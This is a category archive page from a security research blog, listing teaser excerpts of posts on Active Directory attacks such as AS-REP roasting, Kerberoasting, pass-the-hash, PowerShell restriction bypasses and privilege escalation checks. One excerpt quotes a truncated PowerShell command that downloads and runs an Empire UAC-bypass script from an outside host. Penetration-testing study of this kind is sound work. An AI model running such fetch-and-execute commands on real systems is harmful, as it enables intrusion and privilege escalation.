AD Exploitation & Post Exploitation Archives - Cyber Security Research Blogs

OSEP preparation methodology bookmarks

AD exploitation & Post exploitation 13th February 202113th February 2021 blog_h4ck

Here is the list of useful links for additional OSEP preparation methodology. Note :- We are assuming that you already have good experience in activeContinue readingOSEP preparation methodology bookmarks

Kerberoasting initial: AS-REP Roasting

AD exploitation & Post exploitation 20th January 202120th January 2021 blog_h4ck

Introduction AS-REP roasting is an attack that is often-overlooked in my opinion it is not extremely common as you have to explicitly set Accounts Does not RequireContinue readingKerberoasting initial: AS-REP Roasting

Powershell Restrictions bypasses

AD exploitation & Post exploitation 19th January 202119th January 2021 blog_h4ck

In most mature environments and in most of these tests, access to command line tools is restricted. Employees typically cannot spawn Command Prompt or PowerShell.Continue readingPowershell Restrictions bypasses

PowerShell Remoting For pentesters Cheatsheet

All Blog, AD exploitation & Post exploitation 11th May 202013th July 2021 blog_h4ck

PowerShell Remoting Powershell Remoting is feature that used by system admins to run commands in remote systems . It runs via windows remote management service.ItContinue readingPowerShell Remoting For pentesters Cheatsheet

AD Recon For Beginners

All Blog, AD exploitation & Post exploitation 11th May 202013th July 2021 blog_h4ck

List of tools for common AD recon rpclient enum4linux Adexplorer Jdxplorer RSAT nltest netdom Powershell ADmodule Powerview setspn crackmapexec bloodhound sc command wmic command netContinue readingAD Recon For Beginners

Pass the hash: A Nightmare still alive!

All Blog, AD exploitation & Post exploitation 6th May 202013th July 2021 blog_h4ck

There are multiple ways to brute force on an NTLM NTLMV2 hash. Attackers have used the Pass-the-Hash (PtH) attack for over two decades. Its effectivenessContinue readingPass the hash: A Nightmare still alive!

Kerberoasting Common tools

AD exploitation & Post exploitation 4th May 202020th January 2021 blog_h4ck

Before going deeper into Kerberoasting lets understand some of the concepts firsts . The Kerberos authentication system is built on top of tickets served byContinue readingKerberoasting Common tools

Powershell Scripts Execute without Powershell

All Blog, AD exploitation & Post exploitation 21st March 202013th July 2021 Mr.x

In this blog, we will discover the best tool to run PowerShell scripts and commands without using powershell.exe PowerLine NPS — Not PowerShell PowerShdll PowerLessShellContinue readingPowershell Scripts Execute without Powershell

AD exploitation Powershell Cheatsheet

AD exploitation & Post exploitation, All Blog 9th March 202013th July 2021 blog_h4ck

Cheatsheet:- # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1’);Invoke-BypassUAC -Command ‘startContinue readingAD exploitation Powershell Cheatsheet

PowerUp Cheatsheet

AD exploitation & Post exploitation, All Blog 9th March 202013th July 2021 blog_h4ck

PowerUp.ps1 is a program that enables a user to perform quick checks against a Windows machine for any privilege escalation opportunities. It is not a comprehensiveContinue readingPowerUp Cheatsheet

Category: AD exploitation & Post exploitation